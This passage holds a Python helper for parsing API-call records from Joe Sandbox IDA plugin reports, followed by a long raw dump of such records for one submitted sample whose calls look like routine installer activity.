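  • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
  • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
  • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
  • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
"""

# '• [Part of subcall function <addr>: ]<Api>.<MODULE>[(<args>),] ref: <callsite>'
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX8 = re.compile(r"[0-9A-Fa-f]{8}")   # a raw stack word such as 00419000
_IDENT = re.compile(r"[A-Za-z_]\w*")    # an export name such as Ctl3dRegister


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                # call-site address
    via: Optional[str]      # callee the report attributed the call to, if any


def parse_api_lines(text: str) -> list:
    calls = []
    for line in filter(str.strip, text.splitlines()):
        m = _LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = m.group("args")
        calls.append(ApiCall(m.group("api"), m.group("mod"),
                             args.split(",") if args else [],
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def string_args(calls) -> list:
    """Every string-looking argument in first-seen order; '?' and hex words dropped."""
    out = []
    for c in calls:
        for a in c.args:
            if a != "?" and not _HEX8.fullmatch(a) and a not in out:
                out.append(a)
    return out


def resolved_symbols(calls) -> list:
    """Export names found in the 2nd GetProcAddress slot.  In the Wow64 record that
    slot shows 'kernel32.dll' and the names only appear in the preceding
    GetModuleHandleA bullet, so cross-check string_args() before concluding."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) > 1 and _IDENT.fullmatch(c.args[1])]


def imports_by_module(calls) -> dict:
    groups = {}
    for c in calls:
        groups.setdefault(c.module, set()).add(c.api)
    return groups


def unsymbolized(calls) -> list:
    """Calls the plugin could only name by address (73A0A570.USER32 and friends);
    they hide what the function really does and deserve a manual look-up."""
    return [c.api for c in calls if _HEX8.fullmatch(c.api)]
```

On the Ctl3D record this yields the ten Ctl3d*/BtnWndProc3d export names in order; on the Wow64 record resolved_symbols() is empty while string_args() still surfaces Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection, which is why both views are worth keeping when hunting for runtime-resolved imports.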
                                                                                    APIs
                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                    Similarity
                                                                                    • API ID: LongWindow$Prop
                                                                                    • String ID:
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                                    Strings
                                                                                    • PendingFileRenameOperations, xrefs: 00454C70
                                                                                    • WININIT.INI, xrefs: 00454D00
                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                                    • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: $pI$.tmp$oI
                                                                                    APIs
                                                                                    • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                    • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                    • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                    Similarity
                                                                                    • API ID: Window$EnumLongWindows
                                                                                    • String ID: lAB
                                                                                    APIs
                                                                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                                    Similarity
                                                                                    • API ID: AddressDeleteHandleModuleProc
                                                                                    • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                    APIs
                                                                                    • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                                    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                                    Similarity
                                                                                    • API ID: ActiveChangeNotifyWindow
                                                                                    • String ID: $Need to restart Windows? %s
                                                                                    APIs
                                                                                      • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                    • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                                    Similarity
                                                                                    • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                    • String ID: Creating directory: %s
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                                    Similarity
                                                                                    • API ID: AddressByteCharMultiProcWide
                                                                                    • String ID: SfcIsFileProtected$sfc.dll
                                                                                    APIs
                                                                                    • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                    • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                    • RegisterClassA.USER32(?), ref: 004164DE
                                                                                    Similarity
                                                                                    • API ID: Class$InfoRegisterUnregister
                                                                                    • String ID: @
                                                                                    APIs
                                                                                    • 74D31520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                                    • 74D31500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                                    • 74D31540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: D31500D31520D31540
                                                                                    • String ID: j]I
                                                                                    • API String ID: 1003763464-3121892809
                                                                                    • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                    • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                                    • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                    • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastProcess
                                                                                    • String ID: XtE$ptE
                                                                                    • API String ID: 2919029540-3149052308
                                                                                    • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                    • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                                    • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                    • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                                    APIs
                                                                                    • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                      • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                      • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                    • API String ID: 395431579-1506664499
                                                                                    • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                    • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                                    • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                    • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                                    Strings
                                                                                    • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                                    • PendingFileRenameOperations, xrefs: 00454F5C
                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                    • API String ID: 47109696-2115312317
                                                                                    • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                    • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                                    • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                    • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                                    APIs
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
                                                                                    • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
                                                                                    • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                    • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                                    • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                    • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                                    APIs
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                                    • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                                    • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                    • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                                    • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                    • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                                    APIs
                                                                                    • GetMenu.USER32(00000000), ref: 00421371
                                                                                    • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu
                                                                                    • String ID:
                                                                                    • API String ID: 3711407533-0
                                                                                    • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                    • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                                    • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                    • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$CallMessageProcSendTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 601730667-0
                                                                                    • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                    • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                    • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                    • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                    APIs
                                                                                    • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                    • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                    • String ID:
                                                                                    • API String ID: 4071923889-0
                                                                                    • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                    • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                                    • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                    • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                    • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                    • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A14620A480A570EnumFonts
                                                                                    • String ID:
                                                                                    • API String ID: 2780753366-0
                                                                                    • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                    • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                    • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                    • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                    APIs
                                                                                      • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                    • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                                    Strings
                                                                                    • EndOffset range exceeded, xrefs: 0045BAED
                                                                                    • NumRecs range exceeded, xrefs: 0045BAB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlush
                                                                                    • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                    • API String ID: 3593489403-659731555
                                                                                    • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                    • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                                    • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                    • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                                    APIs
                                                                                      • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                                      • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                                      • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                      • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                      • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                      • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                      • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                      • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049708E), ref: 00409B88
